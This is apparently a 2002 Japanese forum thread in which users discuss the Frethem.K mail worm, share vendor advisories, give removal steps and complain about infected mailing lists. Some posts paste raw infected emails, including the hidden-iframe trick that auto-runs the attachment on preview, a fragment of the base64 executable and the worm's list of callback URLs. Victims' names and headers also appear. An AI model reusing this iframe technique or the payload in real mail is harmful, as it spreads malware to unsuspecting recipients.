【流行の】Frethem【ﾖｶｰﾝ】

プレビューしただけで感染するウィルス「Frethem」に注意
〜15日19時現在、未対応のアンチウィルスソフトもあり

http://www.watch.impress.co.jp/internet/www/article/2002/0715/frethem.htm

でじこのこべやのtaskbar.exeはウイルスじゃないにょ

ニュース速報＋のスレ

【PC】件名が「Re: Your Password!」メールに注意、新種ウイルスが流行の兆し
http://news2.2ch.net/test/read.cgi/newsplus/1026721442/l50

☆ウィルス情報＆質問　総合スレッド☆part4の767以後
http://pc.2ch.net/test/read.cgi/sec/1024061532/767-

>>1 乙

かわいそうな作者ﾀﾝ…
ttp://www.vector.co.jp/soft/win31/util/se018881.html

うちの会社でも一人に感染し、exeを実行してしまったので、200人以上にばらまかれました。

全てのWinマシンはIE6にしていたはずだったんだが。

今日になって判明。
気難しい大ボスのマシンがデフォだった。しかもOutlookじゃなくてOE利用。
Nortonの定義ファイルも大昔。

誰だよ、対処しないで放置したの（笑

IE5.0ってパッチあててももうだめかな？
ギコの口が変になるから未だにバージョンアップしてないのだが・・・

>>8
スレ違いの話だけど。
IE6突っ込むなら、クリーンインストール後にやった方がいいよ。
何故かしらんけど、IE5.5にパッチとか散々入れた後だと、IE6インスコ直後から落ちまくりだった。

ちなみに、アドレス一覧から宛先を指定しているようでは無かったです。
ひょっとすると、受信したメールのアドレスに対して全て送信していたかもしれません。

こんな2ちゃんねらー気取りの厨房が立てたスレッドは嫌だ。

アドレスを登録していない人にfromが自分のアドレスのメールが行った
人がいたのでそうかも。偽ったかもしらん。

http://www.watch.impress.co.jp/internet/www/article/2002/0715/frethem.jpg
Becky!だ

何て読むのよ？　ふりーぜん？

OEじゃ怖くてスクリーンショットとれなかったんだろ⊂ ´⌒つ゜ー゜)つ

現地点ではNortonせんせでは亜種が引っかからないyo!

ついでに、発信元になってしまった社内の方、Windows updateは最新の状況に
なっていました。Nortonのウイルス定義ファイルも最新だったようです。
その社員の方からばら撒かれたメールは、OutlookとOutlook expで添付ファイ
ルがあったり、無かったりの症状でした。
Outlook expを利用している方は、添付ファイルが見えてしまうようなので、と
もかくexeファイルを実行しないようにしてくださいネ。

>>17
保存しとく？って警告が出るはずなのにな。
そこで思いつかないってのは、困ったさんっすね。

>>9
アドバイスサンクス
バージョンアップしよ。メーラがHTMLメール比対応のAL-MAILだからあんま気にしてなかったけど。
スレ違いにつきsage

>>14
トレンドマイクロによるとフレゼムKだそうな。

シマンテック、ニュースすら流してないし・・・

>20
情報でとるよ

日本テレコムからウイルス ｷﾀ━━━━━━(ﾟ∀ﾟ)━━━━━━!!!!

Return-Path: <*********[email protected]>
Received: from sh.janog.gr.jp ([210.150.17.51]) by ****************
with ESMTP id <*****************************@sh.janog.gr.jp>;
Mon, 15 Jul 2002 15:**:** +0900
Received: by sh.janog.gr.jp (Postfix)
id 295BF3A618B; Mon, 15 Jul 2002 15:53:19 +0900 (JST)
Delivered-To: [email protected]
Received: from Yellow.japan-telecom.co.jp (Yellow.japan-telecom.co.jp [210.146.35.35])
by sh.janog.gr.jp (Postfix) with ESMTP id CAB313A5F6F
for <[email protected]>; Mon, 15 Jul 2002 15:53:18 +0900 (JST)
Received: from JTEnglish.japan-telecom.co.jp (localhost [127.0.0.1])
by Yellow.japan-telecom.co.jp (3.7W-Yellow) with ESMTP id g6F6r9409577
for <[email protected]>; Mon, 15 Jul 2002 15:53:09 +0900 (JST)
Received: from AFRICA ([172.16.237.23])
by rs41ag02.japan-telecom.co.jp (Lotus Domino Release 5.0.8)
with SMTP id 2002071515523870:991 ;
Mon, 15 Jul 2002 15:52:38 +0900
From: *********[email protected]
To: [email protected]
Subject: Re: Your password!
MIME-Version: 1.0
Date: Mon, 15 Jul 2002 15:52:39 +0900
Message-ID: <[email protected]>
Content-Type: multipart/alternative;
boundary=L1db82sd319dm2ns0f4383dhG

--L1db82sd319dm2ns0f4383dhG
Content-Transfer-Encoding: quoted-printable
Content-Type: text/html;

<HTML><HEAD></HEAD><BODY>
<FONT COLOR=#FF0000>
<b>ATTENTION!</b><br><br>
You can access<br>
<b>very important</b><br>
information by<br>
this password<br><br>
<b>DO NOT SAVE</b><br>
password to disk<br>
use your mind<br><br>
now press<br>
<b>cancel</b><br><br>
(Toshinori Ota)</font></BODY></HTML>
<iframe src=3Dcid:W8dqwq8q918213 height=3D0 width=3D0></iframe>

--L1db82sd319dm2ns0f4383dhG
Content-Type: audio/x-midi;
name=decrypt-password.exe
Content-ID: <W8dqwq8q918213>
Content-Transfer-Encoding: base64

TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA8AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1v
ZGUuDQ0KJAAAAAAAAAAvUy/dazJBjmsyQY5rMkGOMhFSjmkyQY4QLk2OYzJBjuguT45/MkGOgy1L
jg4yQY6DLUqOYzJBjmsyQY5jMkGOCS1SjmAyQY5rMkCOATJBjoMtV45lMkGOUmljaGsyQY4AAAAA

>>22
おぉ？

脳豚　トロすぎ
さっさと対応せんかい　役立たずめが

>>22
名前消しもれてますよ。(ﾌﾟ

>>22

> <b>cancel</b><br><br>
> (Toshinori Ota)</font></BODY></HTML>
> <iframe src=3Dcid:W8dqwq8q918213 height=3D0 width=3D0></iframe>

実名晒してるぞ

Norton は既に対応しとるよ

あらららら。。。

Toshinori Ota は、だれの名前かわからない。
To でも From でもないみたい。

Received: from AFRICA ([172.16.237.23])
の AFRICA って何でしょうか？
私のところには
Received: from AFRICA ([10.40.130.151])
から来ています。

>>29
トレンドだかシマンテックでそのIPアドレス見たような記憶。
今、何故かどっちとも繋がらないんだけど。

HELO AFRICAは多分そのウイルスがSMTPに対して吐いてるコマンド。
アドレスは知らんけど、多分そのPCのIPでしょ。

>>30
おいおい、おまいはプライベートアドレスをしらんのか。
ここ出入り禁止。

俺、このウィルスばらまいたかも。
From のところ書き換えたりするよ。

>>27
まだ対応していないよ。
02/07/15予定 (米国時間)

http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.frethem.k%40mm.html

>>34
http://securityresponse.symantec.com/avcenter/venc/data/[email protected]
には予定、とか書いてないように見えるけど気のせいでしょうか

そう、Fromを偽造する。
社内から山ほどウイルスが来たと思ったら全部社外のIPからだった。

>>29
漏れの勘違いでした。

Symantecにて、ver.Jとver.Kがそれぞれ別に掲載されました。
ver.k
http://www.symantec.com/region/jp/sarcj/data/w/w32.frethem.k%40mm.html
ver.j
http://www.symantec.com/region/jp/sarcj/data/w/w32.frethem.j%40mm.html

TrendMicroでは、まだ1つしか掲載されてないっす。
まとめて見るURLって、どうやるんでしたっけ？
（概要）　http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_FRETHEM.K
（詳細）　http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_FRETHEM.K&VSect=T

というか。漏れのところに届く、ファイルサイズがもっと小さいのがあるんすけど。

うちにも職場にもｷﾀｰよ。
もう大騒ぎ（藁。

>>32
きゃは！恥かしい限りっす。
一瞬これと勘違いしました。

>ワームはシステム常駐後、以下のサイトにアクセスを試み続けます。これはWeb広告サイトの紹介システムのポイントを稼ぐためと思われます：

>>35
定義ファイルのリンク先に行ってみた？
まだ 12日付の定義で15日付の定義はでていないよ。

うちの大学でも大暴れしてた！
60通位来てて、鯖も落ちました

「ポイント」とやらからの収入を得るのって、誰なのか気になる〜
本名で登録していたなら、笑いっす。

脳豚　遅い　役立たず

IFRAME実行系だから、とりあえずIE設定→カスタマイズ→IFRAME実行を無効でOKかな？

嚢豚 AntiVirus がやっと対応しますた

家のパソコンにも届きました。
アドレスで会社の人からとわかったんですが、家のPCのアドレスを
教えているのは会社では別の一人だけなんです。
その人に連絡したら自分は感染してないと言いました。

これって、ネットワーク感染ってことですか？
的外れな質問だったら許して下さいね。

感染すると以下のサイトに接続を繰り返す模様。
ポイント稼ぎ狙いの確信犯だな。
http://12.220.54.29/b.cgi
http://12.224.160.208/b.cgi
http://12.225.239.153/b.cgi
http://12.239.90.200/b.cgi
http://12.249.100.107/b.cgi
http://12.252.211.170/b.cgi
http://128.173.231.167/b.cgi
http://129.120.117.218/b.cgi
http://140.158.208.167/b.cgi
http://143.111.86.30/b.cgi
http://144.132.27.124/b.cgi
http://147.26.215.144/b.cgi
http://150.208.186.200/b.cgi
http://170.11.31.35/b.cgi
http://172.148.216.191/b.cgi
http://172.149.84.171/b.cgi
http://195.13.227.140/b.cgi
http://195.13.227.143/b.cgi
http://195.251.228.133/b.cgi
http://204.57.90.184/b.cgi
http://205.162.24.103/b.cgi
http://207.108.36.78/b.cgi
http://207.171.103.126/b.cgi
http://207.50.54.128/b.cgi
http://208.190.152.25/b.cgi
http://208.28.196.214/b.cgi
http://208.38.78.170/b.cgi
http://209.192.135.22/b.cgi
http://209.34.29.161/b.cgi
http://213.190.55.222/b.cgi
http://217.199.112.38/b.cgi
http://24.138.42.33/b.cgi
http://24.153.41.186/b.cgi
http://24.157.108.78/b.cgi
http://24.159.28.120/b.cgi

続き
http://24.198.18.192/b.cgi
http://24.24.128.16/b.cgi
http://24.242.106.163/b.cgi
http://24.243.76.55/b.cgi
http://24.25.79.187/b.cgi
http://24.91.146.67/b.cgi
http://24.91.187.71/b.cgi
http://4.47.227.27/b.cgi
http://63.106.67.21/b.cgi
http://63.231.167.66/b.cgi
http://63.71.246.234/b.cgi
http://64.211.174.43/b.cgi
http://64.249.48.181/b.cgi
http://65.25.12.45/b.cgi
http://65.67.205.182/b.cgi
http://66.108.150.226/b.cgi
http://66.189.114.161/b.cgi
http://66.233.33.212/b.cgi
http://66.30.52.166/b.cgi
http://66.31.193.42/b.cgi
http://66.31.93.30/b.cgi
http://66.41.32.83/b.cgi
http://66.68.22.102/b.cgi
http://68.113.156.82/b.cgi
http://68.35.125.130/b.cgi
http://68.42.253.163/b.cgi
http://68.57.88.25/b.cgi
http://68.69.53.36/b.cgi

http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.frethem.j%40mm.html
> この亜種は、
> <a href="mailto:[email protected]">W32.Frethem.K@mm</a>として、
> 情報を提供しております。

クリックしたらちょっとビビったよ。

まだ来ない。これってIEのキャッシュのHTML中のメールアドレスは
漁らないのかな。

とにかくすごい量ﾀﾞﾀｰﾖ。

うちは３通。
そのうちMLからが２通。ﾅﾝﾀﾞｶﾅ（´Å｀）

しっかし脳豚は使えねーな。
未だに対策無しとは・・・ダメだこりゃ。

とりあえずIFRAMEを切っとけば問題無しじゃないの？

■ウィルス対策ベンダー各社Frethem.K対応時刻■

・トレンドマイクロ
　　→ 15日19時頃？
・ネットワークアソシエイツ
　　→ 15日19時頃？
・シマンテック
　　→ 15日23時頃？

各社が15時頃からパターンファイル作成開始したと
すると、シマンテックだけ倍近くかかってるってこと？
シマンテックだめじゃん・・・

区分 お知らせ　
投稿日付 2002年07月15日(月)　20時55分29秒
投稿者 COOL管理者 メール [email protected]
時期・期間 指定無し
該当都市 なし
内容 ご利用いただきありがとう御座います。

[email protected]よりワーム型ウイルス（Win32.Frethem.k）のメールが送信されている可能性が御座います。

Re: Your password!

上記の件名で送信されているメールに添付されているファイルは実行せず、必ず破棄されるようお願いいたします。
また、感染の疑いがある場合は早急に調査をされるようお願いいたします。
＊ウイルスの詳細に関しては以下のURL等をご参照ください。
http://www.trendmicro.co.jp/virusinfo/news2002/worm_frethem_k.asp

現在、詳細を調査中ですが、詳しい事が分かり次第追ってご報告させていただきます。

漏れ、ｵﾗｸﾙﾒｰﾘﾝｸﾞﾘｽﾄから貰った（´Д｀；）
ﾒｰﾙのﾍｯﾀﾞって公開していいの？

公開してヨシ！

ｾﾞﾋﾐｾﾃｸﾀﾞｻｲ

From - Wed Nov 14 22:32:40 2001
X-UIDL: ***********************************
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
X-Apparently-To: ******@******.jp *****************.jp; 15 Jul 2002 19:25:28 +0900 (JST)
Return-Path: <***********@******.oracle.co.jp>
X-Track: 1: 40
Received: from ******.oracle.co.jp (202.***.136.**)
by ****************.jp with SMTP; 15 Jul 2002 19:25:25 +0900 (JST)
Received: from localhost (daemon@localhost)
by *******.oracle.co.jp (**************) with SMTP id *******;
Mon, 15 Jul 2002 19:13:07 +0900 (JST)
Received: by oracle.co.jp (bulk_mailer v1.13); Mon, 15 Jul 2002 19:12:40 +0900
Received: (from majordom@localhost)
by naoko.oracle.co.jp (***********) id *******
for terakoya_tech-going; Mon, 15 Jul 2002 19:12:40 +0900 (JST)
X-Authentication-Warning: *******.oracle.co.jp: majordom set sender to owner-terakoya_tech using -f
Received: from mx.ctc-g.co.jp (ns.ctc-g.co.jp [131.248.**.*])
by *****.oracle.co.jp (*************) with ESMTP id ********
for <**********@*****.oracle.co.jp>; Mon, 15 Jul 2002 19:12:38 +0900 (JST)
From: tsuyoshi.ikeda@*******.**.jp
Received: by mx.ctc-g.co.jp (CTC-GN mail 11/07/98) id *******; Mon, 15 Jul 2002 19:25:08 +0900 (JST)
Received: by mx1.ctc-g.co.jp (CTC-GN mail 04/16/98) id ********; Mon, 15 Jul 2002 16:37:47 +0900
Received: by ctcfe.ctc-g.co.jp (CTC-GN mail 11/12/01) id ********; Mon, 15 Jul 2002 16:38:25 +0900
Date: Mon, 15 Jul 2002 16:38:25 +0900
Message-Id: <[email protected]>
To: ************@*****.oracle.co.jp
Subject: [terakoya'tech'info:75] Re: Your password!
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary=L1db82sd319dm2ns0f4383dhG

Sender: **********@*****.oracle.co.jp

--L1db82sd319dm2ns0f4383dhG
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<HTML><HEAD></HEAD><BODY>
<FONT COLOR=#FF0000>
<b>ATTENTION!</b><br><br>
You can access<br>
<b>very important</b><br>
information by<br>
this password<br><br>
<b>DO NOT SAVE</b><br>
password to disk<br>
use your mind<br><br>
now press<br>
<b>cancel</b><br><br>
(＊＊　＊)</font></BODY></HTML>
<iframe src=3Dcid:W8dqwq8q918213 height=3D0 width=3D0></iframe>

Subject: InterScanメッセージ：受信者へ。ファイルブロックに適合したため処理が実行されました。
Date: Mon, 15 Jul 2002 21:09:10 +0900
From: <[email protected]>
To: <[email protected]>

InterScan for Microsoft Exchangeにより添付ファイルがブロックされました。

送信者 = [email protected]
受信者 = [email protected]
件名 = Re: Your password!
検索実行時刻 = 07/15/2002 21:09:10

ファイルブロック時の処理：
添付ファイル decrypt-password.exe は添付ファイルブロック設定に適合しました。InterScanにより削除が実行されました。

Subject: InterScanメッセージ：受信者へ。ウイルスが検出されたか、または添付ファイルブロックの条件に一致しました。
Date: Mon, 15 Jul 2002 20:50:32 +0900
From: System Attendant <[email protected]>
To: "'[email protected]'" <[email protected]>

InterScan for Microsoft Exchangeにより、メールに処理が実行されました。詳細は
次の通りです。

送信者 = [email protected]
受信者 = [email protected]
件名 = Re: Your password!
検索実行時刻 = 07/15/2002 20:50:32
検索エンジン/パターン = 6.150-1001/317

ウイルス発見時の処理：
添付ファイル decrypt-password.exe は添付ファイルブロック設定に適合しました。
InterScanにより移動が実行されました。 添付ファイルは
D:\Trend\Isme\Alert\decrypt-password3d32b70816c.exe_ に移動されました。

受信者への警告！ InterScanによりウイルスが検出されました。

なんだ、実験講師か。

Date: Mon, 15 Jul 2002 21:30:07 +0900
From: "奥原 浩" <[email protected]>
Reply-To: <[email protected]>
To: <[email protected]>

http://www.ipa.go.jp/security/topics/newvirus/frethem.html
をご覧ください。そちらから、ウィルス付メールが送られてきました。


--
*******************************************************

熊谷高校 COM事務局 奥原 浩
Kumagaya Boys' Highschool Webmaster Okuhara Hiroshi

Mail: [email protected]
HP:http://www.kumagaya-h.ed.jp

*******************************************************
--


アホかっちゅうの、MLに投げるなっちゅうの。

COM事務局がコレかよ(ｗ

comかぁ。。。
.netかぁ。。。

MS逝ってよし！

ようやくノートンとInterscanで検出できるようになった

Frethem.kのウィルスが来たのですが、
トレンドマイクロのホームページ見たら
「プレビューしただけで感染」と書いてありました。
もちろん何も知らないのでプレビューしたのですが、
そのときにメーラーが「ウィルスと思われるファイルがありますが…」と表示したのですが、
この場合も感染したことになるのでしょうか？
一応ウィルス検索のために
新規フォルダを作ってそこに保存したのですが。
危ないでしょうか？

あ、ちなみに送られてきたのは
>>56のcoolからです

>>68
対処方法
Windowsフォルダーにコピーされた taskbar.exe を削除する。
参考手順：
1.インターネット接続を遮断する。
（クライアント PC に接続されているイーサネットケーブルや無線 LAN カードを物理的に抜くのが確実で す。）
これによって、ウイルス が動作した場合にも、メール送信による感染拡大を防ぎます。
2.添付ファイルをもった該当メールのメッセージを削除する。
3.Control キー、Alt キー、Delete キーを同時に押下し、プログラム一覧から taskbar を選択し、強制終了する。
4.「スタート」「検索」から、taskbar.exe を探し、削除する。
5.再起動する。

http://www.ipa.go.jp/security/topics/newvirus/frethem.html

>>70
taskbar.exeが見当たらないってことは
感染してないってことでしょうか？

>>71
そうです。文章をよく読みましょう。ハアト。

Subject: そちらからウィルスが送られてきました
Date: Mon, 15 Jul 2002 22:02:23 +0900
From: "Yukihiro Yonehara" <[email protected]>
To: <[email protected]>

http://www.ipa.go.jp/security/topics/newvirus/frethem.html
をご覧ください。そちらから、ウィルス付メールが送られてきました。

至急、対応願います。
米原　幸宏




やかましいんじゃボゲッ！！
なにが至急、対応願いますだアホ

シャープから来ますた。

Received: from rcpt-impgw.biglobe.ne.jp by biglobe.ne.jp (RCPT_GW)
id TAA10966; Mon, 15 Jul 2002 19:15:18 +0900 (JST)
Received: from tg4.sharp.co.jp (tg4.sharp.co.jp [211.4.241.22])
by rcpt-impgw.biglobe.ne.jp (mnmy/3916220502) with ESMTP id g6FAFGc10946
for <[email protected]>; Mon, 15 Jul 2002 19:15:17 +0900 (JST)
Received: from tg.sharp.co.jp (unknown [10.65.37.38])
by tg4.sharp.co.jp (Postfix) with ESMTP id 8CB193C243
for <[email protected]>; Mon, 15 Jul 2002 19:15:16 +0900 (JST)
Received: from ws2-tnr.sharp.co.jp (unknown [10.65.37.40])
by tg.sharp.co.jp (Postfix) with SMTP id 2B92511568A
for <[email protected]>; Mon, 15 Jul 2002 19:15:15 +0900 (JST)
Received: FROM mail.sharp.co.jp BY ws2-tnr.sharp.co.jp ; Mon Jul 15 19:14:45 2002 +0900
Received: from AFRICA by mail.sharp.co.jp (8.10.2/1.1.2.11/09Feb01-0154PM)
id g6FAEjw0002344278; Mon, 15 Jul 2002 19:14:45 +0900 (JST)
Date: Mon, 15 Jul 2002 19:14:45 +0900 (JST)
Message-Id: <[email protected]>
From: [email protected]
To: [email protected]
Subject: Re: Your password!
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary=L1db82sd319dm2ns0f4383dhG
X-UIDL: 799792848084825F976256025F999313405F255

レジストリに
taskbar display "RunDLL deskcp16.dll,QUICKRES_RUNDLLENTRY"

てあるんですけど　これですか？　これを削除すれば　いいんですか？
初めてのことなんで。。。

>>75

それは違う、解像度変更のタスクバーアイコンのやつだろ

>>76
そうだったんですか・・ありがとうございます。
パッチ当ててないＩＥとＯＥ使ってるヘタレなもんで。。
ウィルスメール受け取ったの今回が初めてなもんで（汗
まあ　明らかに怪しいメールだったんで　プレビューで表示されたけど　添付ファイルだけは開けないでそのまま削除しといたんです。

>>77
というかなんでパッチ当てないのかききたい。
へたれとか言ってる暇があったら当てれ。

大学のサーバーが落ちますた

>>64
こいつうちにもきたぞ何者だ？

>>80
MLのROMで
MLへのポスト/リプライの仕方知らない人

Subject: メーリングリスト停止のお願い
Date: Tue, 16 Jul 2002 00:42:37 +0900
From: 石川初男 <[email protected]>
To: [email protected]

管理者殿
　ウィルスの発信元が貴殿のメーリングリストからのものになっています。
早急に停止を。


Subject: test
Date: Tue, 16 Jul 2002 00:52:00 +0900
From: 宮本 明 <[email protected]>
To: <[email protected]>


Subject: test
Date: Tue, 16 Jul 2002 00:52:37 +0900
From: 宮本 明 <[email protected]>
To: <[email protected]>



アホかっちゅうの

このウィルスは送信者偽装するの？

うざ
http://www.turbolinux.co.jp/dcforum/DCForumID11/4068.html

感染してしまった人は以下を参照

手動削除手順：
１）不正プログラムの自動起動設定を削除します。
Windowsのレジストリエディタ(regedit.exe)などを使用して以下のレジストリの値を削除してください。

場所: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
値　: "Task Bar"="＜Windowsディレクトリ＞\taskbar.exe"

トレンドマイクロからコピペ
そしてwindowsディレクトリのtaskbar.exeを削除するのだ

感染後の処置方法等は各ベンダーのサイトでご確認ください。
http://www.symantec.com/region/jp/sarcj/data/w/w32.frethem.k%40mm.html
http://www.symantec.com/region/jp/sarcj/data/w/w32.frethem.j%40mm.html
http://www.trendmicro.co.jp/virusinfo/news2002/worm_frethem_k.asp
http://www.nai.com/japan/virusinfo/virF.asp?v=W32/Frethem.l@MM
http://www.nai.com/japan/virusinfo/infoFrethem.asp

「メールにウィルスがおったぞｺﾞﾙｧ」って本文のFrom:に
投げるのはやめれ＞某組織
投げんならちゃんとenvelope fromに返せっつーの
ここは <> なメールも受け取らんし何考えてんだ

うちにも２通来たけど、どっちも添付ファイルがなかった。
これは安全なのか？

>>87
何も考えてない。

題名に「ウィルス」と入れて欲しかった

うちのは taskbar.exe を削除したのに、まだウイルスばら撒いてる。
なんで？

>>91 「WORM_FRETHEM.K」駆除ツール使え↓
http://www.trendmicro.co.jp/esolution/solutionDetail.asp?solutionID=4305
駆除後はアンチウィルスソフト常駐させよ。

>>87
KLEZ で詐称された From のアドレス宛に、ウィルス警告メールを送ってくる
対策ソフトもうざい。

>>93 何のソフト？

やーねぇ。
昨日夕刻にきたわよ。
その場でノートンの更新をしたけど駄目だったのよ。
アドレス帳が”送ってはいけない人たち”リストになってたのよ。
今日は朝から脅しメールや電話が来まくるのよやーねぇ。

ちなみにあたしんちは三菱から来たわよ

あぼーん

>>93
InterScanだとenvelope-fromに送るみたいだけど。

中京テレビのディズニーオンアイス事務局やられてねーか？
ディズニーオンアイス事務局あてのウイルス警告メールが
うちにがんがん流れてくるんだけど。なんで？
ちなみに本体は来てません。

>>98 送らない設定にもできるみたいね。

>99
ウチにもｶﾞﾝｶﾞﾝきてる・・・。ディズニーオンアイス・・・。

こんな、2ch用語を多用したい盛りの2ちゃんねらー気取りの夏厨が立てた
スレッドは嫌だ。

>>98
Fromに直接返信する、困ったのがあるようなんですけど。
何なんでしょうね。

　　　

envelop-from も偽造します。

添付ﾌｧｲﾙが無かったんで開いちゃった・・。赤い文字見て「？」と思って直ぐ削除。
ｱﾝﾁｳｨﾙｽｿﾌﾄのｻｲﾄ見て直ぐにtaskbar.exeとかnotepad.iniとか
検索したけど無い。ﾚｼﾞのrunも平気だった。
そもそも何で添付ﾌｧｲﾙが無かったんだろう？

>>104
漏れ宛てのレスっすか？
各種っす。

>>105
そっちの方は何だか、メル送ってもいい返事じゃないっすね。
そっちもやっぱ偽装のケースが多いんでしょうか。

感染するバカってうんこ以下だな

>>106
経路上のゲートウェイ（またはウィルスチェックサーバ）が
添付ファイルのみを削除している可能性があります。
この場合は安全です。
とりあえず、亜種の感染パターンとその検出法を確認して、
自分のマシンが感染しているかどうかを（以下略：酔ってるんで寝る

今回は発生から伝播まで時間がなかったからね、ウィルスゲートウェイも
ほとんど間に合わなかったんじゃないかな。こいつらのエンジンも基本的には
クライアント用ウィルス対策ソフトと同等だし。

うちは夜中に自動更新してるから、昨日の夕方から夜にかけてかなりの
感染者が出た。おまえら、ちゃんと謝っとけよ（ｗ ＞感染者ども

Subject:
[oratech:4619] Re: Your password!
From:
[email protected]
Date:
Tue, 16 Jul 2002 09:08:22 +0900 (JST)
To:
******@*****.oracle.co.jp

ATTENTION!

You can access
very important
information by
this password


もう、やになっちゃうわ
DO NOT SAVE
password to disk
use your mind

now press
cancel

(kuga)

４件出してしまった。もちろん、謝っときますた

これって、IEコンポーネントのバグでプレビューだけで感染する奴だろ？
NimdaだのBadtransだのが大流行してさんざん注意喚起されてたのに、
なんでいまだに引っかかる奴がいるんだ？

企業内感染
１．ウィルス対策ソフトに守られているという油断
２．普段から実行ファイルをメールでやり取りする意識の低さ
３．リッチテキストが添付ファイルに変換されるというグループウェアの罠

一般ユーザー間の感染
１．ウィルス対策ソフト未導入
２．Windows／IE／Outlookセキュリティパッケージ未適用
３．Outlookプレビュー有効

こんなところだろ。

亜種が増えてるらしい。

感染しても修復ツール使えば治るからだろ。
修復ツールはロハだし。利用者制限ないし。
周りが買えば、そいつらがウィルス検知してくれるし。

>>115
もう亜種があるのか。早いね。

今まで散々このテのウィルスに対する警告はされてたのにこの実態は何？
coderedアタックもまだ有効ってことかぁ（藁。

漏れの周囲、割れOSでパッチ当てられないﾔｼ多すぎ (;´Д｀)

>>109 >>110
俺にｳｨﾙｽﾒｰﾙ来たのが（ﾒｰﾙﾁｪｯｸしたのが）昨日の夜の12時位だったから
もしかしたら間に合っていたのかもしれない。

ｱﾝﾁｳｨﾙｽｿﾌﾄも入れてるし、IEもﾊﾟｯﾁあててるし、ﾌﾟﾚﾋﾞｭｰも消してた。
でも添付ﾌｧｲﾙ無しのﾒｰﾙだったから油断して開いちまった・・。
ｱﾝﾁｳｨﾙｽをもう一度ｱｯﾌﾟﾃﾞｰﾄして調べたがやっぱり感染して無かったよ。
油断してたとは言え、感染しそうになっちまったよ・・。

Subject: Virus付きメールは早急に停止せよ
Date: Mon, 15 Jul 2002 23:49:48 +0900
From: "Akihiko Harada" <[email protected]>
To: <[email protected]>

[email protected] より大量のVirus付きメールが
配信されているのを早く停止せよ

Virusと、個人情報をいつまでバラ撒くつもりか・・・



・・まず、おまえの脳波を停止しろよ。
個人情報ってなによ？(ｗ

うちにもｷﾀ━━━━━━(ﾟ∀ﾟ)━━━━━━!!!!

『compath』ってトコのML経由でやって来ますた。
MLと言うことでアドレスはさらさないけど・・・これでまた
感染被害拡大のﾖｶｰﾝ。

うちにもここからｷﾀ━━━━━━(ﾟ∀ﾟ)━━━━━━!!!!

[email protected]

>>120
> X-Mailer: Microsoft Outlook Express 6.00.2600.0000
目くそ鼻くそかよ！(w

[email protected]から来たメールに
Re: Your password!
ってかいてあった。
IE以外で開いてみたら、中身は>>60に描いてある内容と同じだった。
これってサポセンがウィルスにかかってるのか？

>>121-122
Subject: 受信者へのレポート
レポートｷﾀ━━(ﾟ∀ﾟ)━━!!

>>125
うちにもｷﾀ━━(ﾟ∀ﾟ)━━!!

「受信者へのレポート」ってタイトルの３通。
「アラート - GroupShield チケット番号 ＊＊＊＊＊＊＊＊＊＊＊＊＊＊ が生成されました」
ってのが１通。
どれもcompathしゃん＆とあるビグローブのユーザーがらみ。
シロートの私には、なんでこれが自分のとこに送られてくるのかわからないけど……。

>>121-122,125,126
ｷﾀ━━━━━(ﾟ∀ﾟ)━━━━━!!
しかも部長のところ。
うちの会社、一昨日からいっぱい来てるyo。
でも、感染者０
アンチウイルスソフト入れてるけど、信用ないんで、
常にセキュリティに気を配ってます（´Д｀；）

NTT東日本からｷﾀ━━(ﾟ∀ﾟ)━━!!

From: [email protected]
Received: from AFRICA ([202.23.132.39]) by mail.doshisha.ac.jp (8.9.3 (PHNE_18546)/3.7W-001122) id RAA08095; Mon, 15 Jul 2002 17:07:52 +0900 (JST)
Date: Mon, 15 Jul 2002 17:07:52 +0900 (JST)
Message-Id: <[email protected]>
To: [email protected]
Subject: Re: Your password!
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary=L1db82sd319dm2ns0f4383dhG

ｱﾌｫ大学ｷﾀ━━━（ ´∀｀）･ω･） ﾟДﾟ）ﾟ∀ﾟ）･∀･）￣ー￣)´･ω･｀）＿-）ﾟ∋ﾟ）´Д｀）ﾟーﾟ）━━━!!!!!
デカいメールは無視する設定だから今ごろ気づいた(w

うちにもレポート　ｷﾃﾀ━━(ﾟ∀ﾟ)━━!!（ｗ

件名：受信者へのレポート
警告: 添付ファイル att3.eml はウイルス Exploit-MIME.gen に感染しています。添付
ファイルからウイルスが駆除されていません。

さらに
件名：アラート - GroupShield チケット番号 〜〜〜〜〜 が生成されました

>>126
compathと聞くとココが思い当たるが・・・。
http://www.google.com/search?q=COMPATH&ie=UTF-8&oe=UTF-8&hl=
ja&btnG=Google+%E6%A4%9C%E7%B4%A2&lr=lang_ja
の一番上のヤツ。昔ココの懸賞に応募した記憶あるし（ｗ

途中で改行入れたら切れた・・・鬱。（´Д｀；）
正解はコチラ。
http://www.google.com/search?q=COMPATH&ie=UTF-8&oe=UTF-8&hl=ja&btnG=Google+%E6%A4%9C%E7%B4%A2&lr=lang_ja

>>87 の件ですが重大な事実誤認がありました。
From: に返すのではなく To: に返すのでした。
いったい何のために...

>>130
うちにもcompat-ml-secretできたよ。
一発目がbiglobeユーザーで、これ以降ML経由とみられる
クラリオンだのなんだのから続々と。
でもMLなんか入ってないのになあ。

compath、漏れとこもまったく同じの来た。
漏れも>131の懸賞応募したことあるわ。

compat-ml-secretを運営している会社のトップページに、
「弊社メールサーバからウィルスメールが配信されました。
大変ご迷惑をおかけしておりますが、 原因については只今調査中ですので、
もうしばらくお待ちください。」
と出ています。

>>130

なるほど〜。
ココの懸賞、応募した記憶とかないけれど、でもしたことあるのかもな〜忘れてるからな〜（汗。

ところで、うちに来たのてレポートだけで、ウイルスのほうは来てない。なんでだろ？

>>136

……いや、よく考えたらあった＞ウイルスメール
見知らぬメアドから来たのが一通。
うざいと思ってサーバ上で消してしまったので、どっからかはもはや分からないけど。

名乗るの忘れてますた。

連続カキコスマソ。

>>137
ああ、うちと同じだ。
最初に ***@***.biglobe.ne.jp　からきてて
これ冷凍したら数時間後にML経由で続々とやってきた
